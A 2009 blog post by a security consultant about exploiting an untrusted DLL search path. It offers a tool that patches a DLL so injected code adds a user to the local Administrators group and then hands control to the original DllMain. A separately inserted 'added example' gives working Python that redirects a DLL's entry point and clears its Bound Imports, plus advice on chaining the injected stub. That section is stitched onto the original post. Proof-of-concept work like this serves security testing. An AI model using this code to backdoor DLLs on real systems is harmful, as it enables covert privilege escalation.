REBlog
October 23rd, 2009, 16:20
In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability and need to create a proof-of-concept that demonstrates it is actually exploitable.
Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writable by an unprivileged attacker (CWE-426, Untrusted Search Path: "http://cwe.mitre.org/data/definitions/426.html"). An unprivileged attacker could write a malicious DLL to this location, and when the application loads it, the DLL's code would execute in the context of the privileged user.
Ideally, we'd like the "malicious" DLL to keep all the functionality of the DLL that the application expected to load, including the same exported functions, so that the application keeps working after the payload runs. In other words, what I really wanted was an easy way to patch an existing DLL so that my "malicious" code runs before the DLL's original DllMain, after which the original DllMain is called and the DLL continues to operate as normal. Unfortunately, I know of no programs that patch DLLs on disk this way, so I made my own.
The program attached to this blog post redirects a given DLL's entry point (which originally pointed to DllMain) to code that has been patched into the DLL. This patched-in code adds a given user to the local Administrators group (assuming it is running in the context of a privileged user), after which it transfers control back to the DLL's original DllMain. The patcher also updates the DLL's Import Table, since the patched-in code relies on NetLocalGroupAddMembers(...) ("http://msdn.microsoft.com/en-us/library/aa370436(VS.85).aspx") from netapi32.dll. The only other side effect of the patcher is that it clears the DLL's Bound Imports; the worst consequence of that is that the DLL may take a few extra milliseconds to load.
The patcher is compatible with both 32-bit and 64-bit DLLs.
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you encounter any problems or have any questions.
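The entry-point redirect and Bound Import clearing described above, as an added example that is not the post's DllPatcher: it parses PE32 and PE32+ headers with the Python standard library, checks that the new entry RVA lands in an executable section and that netapi32.dll is already in the import table (the post's patcher adds that import itself; this example only reports when it is missing), rewrites AddressOfEntryPoint, zeroes the Bound Import directory, and returns the original entry RVA for the injected stub to chain to. The stub bytes themselves are not shown. The test image, the RVAs 0x1080 and 0x1100, and the one-section layout are constructed for the example and are not from the post.

```python
"""Added example (not the post's DllPatcher): redirect a DLL's AddressOfEntryPoint on disk for PE32 and
PE32+, clear the Bound Import directory, and pre-check what the injected stub needs. Stdlib only."""
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DIR_IMPORT, DIR_BOUND_IMPORT = 1, 11             # IMAGE_DIRECTORY_ENTRY_* indices
IMAGE_SCN_MEM_EXECUTE = 0x20000000
ORIGINAL_DLLMAIN_RVA, STUB_RVA = 0x1080, 0x1100  # assumed RVAs inside the synthetic test DLL below

def parse_pe(data):
    """Locate the optional header, data directories and section table of a PE32/PE32+ image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)  # IMAGE_FILE_HEADER
    opt = e_lfanew + 24                                            # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dirs = opt + (96 if magic == PE32_MAGIC else 112)              # DataDirectory[]; ImageBase is 8 bytes in PE32+
    sections = []
    for i in range(nsect):                                         # IMAGE_SECTION_HEADERs follow the optional header
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name.rstrip(b"\0"), va, max(vsize, rawsize), rawptr, chars))
    return {"magic": magic, "entry": opt + 16, "dirs": dirs,
            "ndirs": struct.unpack_from("<I", data, dirs - 4)[0], "sections": sections}

def rva_to_offset(pe, rva):
    for _, va, size, rawptr, _ in pe["sections"]:
        if va <= rva < va + size:
            return rawptr + (rva - va)
    raise ValueError("RVA 0x%x is not inside any section" % rva)

def read_directory(data, index):
    pe = parse_pe(data)
    return struct.unpack_from("<II", data, pe["dirs"] + 8 * index) if index < pe["ndirs"] else (0, 0)

def read_entry_point(data):
    return struct.unpack_from("<I", data, parse_pe(data)["entry"])[0]

def imported_dlls(data):
    """Walk the IMAGE_IMPORT_DESCRIPTOR array and return the imported module names, lower-cased."""
    pe, (va, _), names = parse_pe(data), read_directory(data, DIR_IMPORT), []
    off = rva_to_offset(pe, va) if va else None
    while off is not None:
        _oft, _stamp, _fwd, name_rva, first_thunk = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0 and first_thunk == 0:                     # all-zero descriptor ends the array
            break
        noff = rva_to_offset(pe, name_rva)
        names.append(data[noff:data.index(b"\0", noff)].decode("ascii").lower())
        off += 20
    return names

def preflight(data, new_entry_rva, required_dll="netapi32.dll"):
    """Return the reasons the patch would not work at load time, or [] if it is safe to apply."""
    pe, problems = parse_pe(data), []
    # The stub must live in an executable section, or DEP faults before the real DllMain is reached.
    if not any(va <= new_entry_rva < va + size and chars & IMAGE_SCN_MEM_EXECUTE
               for _, va, size, _, chars in pe["sections"]):
        problems.append("new entry RVA 0x%x is not in an executable section" % new_entry_rva)
    # The stub reaches NetLocalGroupAddMembers through the IAT, so its module must be imported (only checked here).
    if required_dll not in imported_dlls(data):
        problems.append("%s is not imported" % required_dll)
    return problems

def patch_entry_point(data, new_entry_rva, required_dll="netapi32.dll"):
    """Point AddressOfEntryPoint at new_entry_rva and clear Bound Imports; return (image, original entry RVA)."""
    problems = preflight(data, new_entry_rva, required_dll)
    if problems:
        raise ValueError("; ".join(problems))
    buf, pe = bytearray(data), parse_pe(data)
    old_entry = struct.unpack_from("<I", buf, pe["entry"])[0]
    struct.pack_into("<I", buf, pe["entry"], new_entry_rva)
    # Bound imports pre-resolve the IAT against specific builds of the imported DLLs; after the import
    # table is edited that data is stale, so zero the directory and let the loader resolve at load time.
    if pe["ndirs"] > DIR_BOUND_IMPORT:
        struct.pack_into("<II", buf, pe["dirs"] + 8 * DIR_BOUND_IMPORT, 0, 0)
    return bytes(buf), old_entry

def build_test_dll(magic, import_name=b"netapi32.dll"):
    """Constructed test input, not a real DLL: one executable .text section at RVA 0x1000 holding an
    import descriptor for import_name, a bound-import entry to clear, and the entry point at 0x1080."""
    opt_size, dirs = (224, 96) if magic == PE32_MAGIC else (240, 112)
    text_rva, text_raw, text = 0x1000, 0x200, bytearray(0x200)
    struct.pack_into("<IIIII", text, 0, 0x1180, 0, 0, text_rva + 40, 0x1180)  # descriptor; next one is zeros
    text[40:41 + len(import_name)] = import_name + b"\0"
    opt = bytearray(struct.pack("<H", magic).ljust(opt_size, b"\0"))          # Magic, rest zero-filled
    struct.pack_into("<I", opt, 16, ORIGINAL_DLLMAIN_RVA)                     # AddressOfEntryPoint
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                           # SectionAlignment, FileAlignment
    struct.pack_into("<IIIII", opt, dirs - 4, 16, 0, 0, text_rva, 40)         # NumberOfRvaAndSizes, export, import
    struct.pack_into("<II", opt, dirs + 8 * DIR_BOUND_IMPORT, 0x180, 0x20)    # pretend the DLL was /BIND-ed
    file_hdr = struct.pack("<HHIIIHH", 0x14C if magic == PE32_MAGIC else 0x8664, 1, 0, 0, 0, opt_size, 0x2002)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, text_rva, 0x200, text_raw, 0, 0, 0, 0, 0x60000020)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 64)                    # e_lfanew = 64
    return (dos + b"PE\0\0" + file_hdr + bytes(opt) + section).ljust(text_raw, b"\0") + bytes(text)

if __name__ == "__main__":
    img, old = patch_entry_point(build_test_dll(PE32PLUS_MAGIC), STUB_RVA)
    print("entry 0x%x -> 0x%x, bound imports now %r" % (old, read_entry_point(img), read_directory(img, DIR_BOUND_IMPORT)))
```

The returned original entry RVA is the address the stub must jump to once NetLocalGroupAddMembers returns; the stub receives the same (hinstDLL, fdwReason, lpvReserved) arguments DllMain would, is invoked on every thread attach/detach as well as process attach, and so should preserve those arguments and act only on DLL_PROCESS_ATTACH. Rewriting the header also invalidates any Authenticode signature the original DLL carried, which matters if the loading application checks one.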
Attachment(s): DllPatcher.zip
http://malwareanalysis.com/CommunityServer/blogs/geffner/attachment/992.ashx
http://malwareanalysis.com/CommunityServer/blogs/geffner/archive/2009/10/23/992.aspx